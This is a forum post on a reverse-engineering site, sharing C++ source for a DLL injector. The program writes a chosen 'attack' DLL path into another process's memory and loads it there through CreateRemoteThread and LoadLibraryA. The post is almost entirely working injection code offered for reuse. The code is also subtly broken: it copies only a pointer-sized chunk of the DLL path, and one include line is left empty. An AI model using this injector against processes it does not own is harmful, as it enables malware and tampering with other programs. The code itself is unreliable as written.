Exetools  

Go Back   Exetools > General > Source Code

Notices

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 10-11-2015, 19:40
CryptXor CryptXor is offline
Friend
 
Join Date: Oct 2015
Posts: 68
Rept. Given: 0
Rept. Rcvd 24 Times in 12 Posts
Thanks Given: 34
Thanks Rcvd at 131 Times in 39 Posts
CryptXor Reputation: 24
[C++] DllInjection

All credits for this go to the Information Systems and Internet Security (ISIS) Laboratory. I am just sharing this since it is something that I have used often and it works damn well! Hope someone else finds it just as useful

Code:
#include 
#include "windows.h"
#include "stdlib.h"

using namespace std;

int main(int argc, char *argv[])
{
	HANDLE prochandle;	//a handle to the process we want to inject our dll into
	HANDLE threadhandle;	//this will be a handle to the remote thread we will create
	HMODULE dllhandle;	//a module handle to the dll we want to inject into a running process
	int procid;	//this will be the process id of the process we want to inject our dll into
	FARPROC loadlibraryaddr;	//the address of the load library function
	void* baseaddr;		// the base address of our arguments to loadlibrary function
	char* attackdll;	//this will be the full filename of our attacking dll

	
	/*
		Parse the arguments
	*/
	if(argc < 2 || argc > 3)
	{
		cout << "Error, incorrect amount of args" << endl;
		return -1;
	}

	if(argc == 2)
	{
		procid = atoi(argv[1]);	//save the process id
		attackdll = "C:\\windows\\testdll.dll";	//set a default dll
	}

	else
	{
		procid = atoi(argv[1]);	//save the process id
		attackdll = argv[2];	//save the dll path
	}

	/*
		Begin the dll injection process
		1) get a handle to the process we want to inject our dll into
		2) Get the address of the windows function LoadLibraryA function
		3) Create the arguments structure to pass into our create thread function
		4) Call CreateRemoteThread
	*/

	// 1. Get a handle to our process
	prochandle = OpenProcess
				(
					PROCESS_ALL_ACCESS,		//desired access
					FALSE,					//inherit handle, is this handle inheritable
					procid					//procid of the process
				);

	if(prochandle == NULL)
	{
		cout << "Error, could not get a handle to the process" << endl;
		return -1;
	}

	cout << "Process Handle acquired" << endl;

	//2. Get the address to LoadLibraryA

	//2a. First get a handle to the Kernel32 dll, since this is where LoadLibraryA
	dllhandle = GetModuleHandle("Kernel32.dll");
	if(dllhandle == NULL)
	{
		cout << "Error, could not get a handle to Kernel32.dll" << endl;
		return -1;
	}

	cout << "Kernel32.dll handle acquired" << endl;


	//2b. Now that we have the handle to kernel32 we just need to get
	//the base address of the LoadLibraryA function
	loadlibraryaddr = GetProcAddress
						(
							dllhandle,	//hmodule
							"LoadLibraryA"	//process name
						);

	if(loadlibraryaddr == NULL)
	{
		cout << "Error, unable to obtain the address to LoadLibraryA" << endl;
		return -1;
	}

	cout << "Acquired the address to LoadLibraryA" << endl;

	//3. Allocate and fill in the memory we will use for our arguments to 
	// the remote thread

	baseaddr = VirtualAllocEx
				(
					prochandle,	//handle to our process, which address space the mem is allocated in
					NULL,	//address
					256,	//size of allocated memory
					MEM_COMMIT | MEM_RESERVE,	// allocation type
					PAGE_READWRITE		// protections
				);

	if(baseaddr == NULL)
	{
		cout << "Error, unable to allocate memory" << endl;
		return -1;
	}

	//4. Fill in the memory allocated for our arguments

	if( WriteProcessMemory
			(
				prochandle,	//handle to the process containing our allocated memory
				baseaddr,	//the address of the memory location
				attackdll, //the actual argument characters
				sizeof(attackdll +1), //the size of the argument plus a null byte
				NULL	//number of bytes written
			) == NULL)
	
	// this would be the condition that we weren't able to write to memory
	{
		cout << "Error, could not write the arguments into memory" << endl;
		return -1;
	}


	//5. Create a thread inside of our remote process we use this to get
	// into the address space of a remote process
	threadhandle = CreateRemoteThread
					(
						prochandle,		//the handle to our remote process
						NULL,			//thread attributes
						0,				//stack size
						(LPTHREAD_START_ROUTINE)loadlibraryaddr,	//start address
						baseaddr,		//the address of our arg stack
						0,			//creation flags
						NULL		//thread id
						);
}
Reply With Quote
The Following 3 Users Gave Reputation+1 to CryptXor For This Useful Post:
giv (10-12-2015), niculaita (10-11-2015), uranus64 (10-12-2015)
The Following 8 Users Say Thank You to CryptXor For This Useful Post:
crystalboy (02-27-2016), giv (10-12-2015), lordnasty (10-12-2015), niculaita (10-11-2015), Storm Shadow (10-12-2015), user1 (01-01-2016)
 

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On



All times are GMT +8. The time now is 17:15.


Always Your Best Friend: Aaron, JMI, ahmadmansoor, ZeNiX, chessgod101
( 1998 - 2024 )